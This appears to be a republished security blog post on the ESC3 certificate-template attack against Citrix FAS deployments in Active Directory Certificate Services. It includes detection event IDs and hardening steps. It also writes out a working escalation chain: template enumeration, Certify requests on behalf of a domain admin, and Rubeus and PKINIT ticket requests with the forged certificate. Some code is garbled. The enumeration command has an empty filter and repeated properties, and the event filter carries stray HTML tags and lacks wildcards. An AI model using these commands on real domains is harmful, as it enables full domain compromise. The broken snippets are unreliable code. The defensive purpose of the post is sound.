The Citrix FAS ESC3 Hack: How Default Certificates Grant Domain Admin Access

Listen to this Post

Featured Image

Introduction:

A critical misconfiguration in Citrix Federated Authentication Service (FAS) deployments can create a devastating privilege escalation path known as ESC3. This attack leverages default certificate template permissions that allow Domain Computers to enroll in specific templates, ultimately enabling attackers to forge authentication certificates and achieve Domain Administrator privileges. Understanding this vulnerability chain is essential for securing Active Directory Certificate Services (AD CS) environments.

Learning Objectives:

  • Understand the certificate template vulnerability chain in Citrix FAS deployments enabling ESC3 attacks
  • Learn to identify vulnerable certificate templates and associated dangerous permissions
  • Implement proper hardening measures to prevent certificate-based privilege escalation

You Should Know:

1. Understanding the ESC3 Attack Vector

The ESC3 attack represents a critical privilege escalation path within Active Directory Certificate Services (AD CS) where specific certificate templates contain misconfigured permissions that enable domain compromise. In the Citrix FAS context, two particular templates create this vulnerability: Citrix_RegistrationAuthority and Citrix_SmartcardLogon. The attack chain begins when Domain Computers gain enrollment rights to the Citrix_RegistrationAuthority template, which then allows them to request certificates from the Citrix_SmartcardLogon template on behalf of other users. This certificate-based impersonation effectively bypasses standard authentication controls.

Step-by-step guide explaining what this does and how to use it:
– The vulnerability exists because Citrix FAS requires specific certificate templates for its smartcard-like authentication functionality
– By default, Domain Computers receive excessive permissions that enable certificate enrollment and management capabilities beyond their intended scope
– An attacker who compromises any domain-joined computer can leverage these templates to request certificates for privileged accounts

2. Identifying Vulnerable Certificate Templates

Before exploitation can occur, attackers must first identify vulnerable certificate templates within the AD CS environment. This reconnaissance phase utilizes built-in Windows tools to enumerate certificate templates and their associated permissions. The critical finding involves templates that grant enrollment rights to Domain Computers while also enabling certificate authentication and client authentication extensions.

Step-by-step guide explaining what this does and how to use it:

 PowerShell to enumerate certificate templates
Get-ADObject -Filter  -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Properties Name, DisplayName, msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-Private-Key-Flag, pKIExtendedKeyUsage, pKIDefaultKeySpec, msPKI-Cert-Template-OID, msPKI-RA-Signature, msPKI-RA-Application-Policies, msPKI-RA-Policies, msPKI-Certificate-Policy, msPKI-Supersede-Templates, msPKI-RA-Policies, msPKI-Template-Schema-Version, msPKI-Template-Minor-Revision, msPKI-Minimal-Key-Size, msPKI-Template-Schema-Version, msPKI-Private-Key-Flag, msPKI-Certificate-Application-Policy, msPKI-RA-Application-Policies, msPKI-RA-Policies, msPKI-Certificate-Policy, msPKI-Supersede-Templates, msPKI-RA-Policies, msPKI-Template-Schema-Version, msPKI-Template-Minor-Revision, msPKI-Minimal-Key-Size, msPKI-Template-Schema-Version | Format-List

3. Exploiting Certificate Enrollment Permissions

Once vulnerable templates are identified, attackers can exploit the enrollment permissions granted to Domain Computers. The Citrix_RegistrationAuthority template typically contains the “Enroll” permission for Domain Computers, enabling them to request certificates from the associated template. This becomes particularly dangerous when combined with the “Autoenroll” permission or when the template allows enrollment on behalf of other security principals.

Step-by-step guide explaining what this does and how to use it:

 Check specific template permissions using certutil
certutil -v -dstemplate "Citrix_RegistrationAuthority"
certutil -v -dstemplate "Citrix_SmartcardLogon"

Verify Domain Computer enrollment rights
Get-ACL "CN=Citrix_RegistrationAuthority,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" | Select-Object -ExpandProperty Access | Where-Object {$_.IdentityReference -eq "DOMAIN\Domain Computers"}

4. Certificate Request and Domain Privilege Escalation

With enrollment permissions confirmed, attackers can proceed with certificate requests that ultimately lead to domain administrator privileges. The technical process involves using the compromised computer account to request a certificate from the Citrix_RegistrationAuthority template, then leveraging that certificate to request additional certificates from the Citrix_SmartcardLogon template for privileged users.

Step-by-step guide explaining what this does and how to use it:

 Using Certify to request certificates
Certify.exe request /ca:CA-SERVER.domain.com\DOMAIN-CA /template:Citrix_RegistrationAuthority

Then use the obtained certificate to request for privileged account
Certify.exe request /ca:CA-SERVER.domain.com\DOMAIN-CA /template:Citrix_SmartcardLogon /onbehalfof:DOMAIN\domainadmin /enrollercert:registration_cert.pfx /enrollerkey:registration_key

5. Authentication with Forged Certificates

The obtained user certificate enables authentication through PKINIT, either via Schannel or directly through tools that support certificate authentication. This bypasses standard credential requirements and allows the attacker to authenticate as the targeted privileged user without knowing their password.

Step-by-step guide explaining what this does and how to use it:

 Using Rubeus with the obtained certificate
Rubeus.exe asktgt /user:domainadmin /certificate:obtained_cert.pfx /password:certpassword /domain:domain.com /dc:DC.domain.com /ptt

Alternative using Pass-the-Certificate technique
python gettgtpkinit.py -cert-pfx obtained_cert.pfx -pfx-pass certpassword domain.com/domainadmin domainadmin.ccache

6. Detection and Monitoring Strategies

Organizations should implement comprehensive monitoring for certificate-related activities, particularly focusing on unusual enrollment patterns and certificate requests from computer accounts for user templates. Specific Windows Security events provide crucial telemetry for detecting ESC3 exploitation attempts.

Step-by-step guide explaining what this does and how to use it:

 Monitor for certificate enrollment events (Windows Event IDs)
 4886: Certificate Services received a certificate request
 4887: Certificate Services issued a certificate
 4890: Certificate Services template security was updated

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4886,4887,4890} | Where-Object {$<em>.Message -like "Citrix_RegistrationAuthority" -or $</em>.Message -like "Citrix_SmartcardLogon"}

7. Mitigation and Hardening Measures

Citrix has released specific security hardening guidance to address these vulnerabilities. The primary mitigation involves modifying certificate template permissions to remove excessive rights granted to Domain Computers and implementing proper access controls that follow the principle of least privilege.

Step-by-step guide explaining what this does and how to use it:
– Remove Domain Computers from the Citrix_RegistrationAuthority template permissions
– Restrict enrollment rights to only authorized administration accounts
– Implement certificate manager approval for sensitive templates
– Regularly audit certificate template permissions and enrollment activities
– Apply the latest Citrix security updates and hardening guidelines from their official security bulletin

What Undercode Say:

  • Default permissions in enterprise certificate templates represent a systemic security failure that creates invisible privilege escalation paths
  • The ESC3 attack demonstrates how seemingly minor misconfigurations in auxiliary services can compromise entire domain security
  • Certificate-based authentication requires the same rigorous security controls as traditional credential-based systems

The Citrix FAS ESC3 vulnerability exemplifies the hidden risks in complex enterprise authentication systems. While Citrix FAS provides legitimate business functionality, its default configuration creates dangerous attack paths that many organizations remain unaware of. This incident underscores the critical importance of extending security hardening beyond core operating systems and applications to include supporting infrastructure like AD CS. The fact that Domain Computers—a group encompassing every domain-joined system—had excessive certificate enrollment rights highlights how default configurations often prioritize functionality over security. Organizations must implement regular AD CS security assessments as part of their overall security posture, with particular attention to certificate template permissions and enrollment rights.

Prediction:

Certificate template attacks will increasingly become a primary attack vector as traditional credential theft techniques face improved detection capabilities. The migration toward certificate-based authentication across cloud and hybrid environments will expand the attack surface, requiring organizations to develop specialized expertise in public key infrastructure (PKI) security. Future attacks will likely combine certificate template vulnerabilities with AI-generated certificate requests to bypass anomaly detection systems, creating an arms race in certificate-based authentication security.

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Huykha How – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky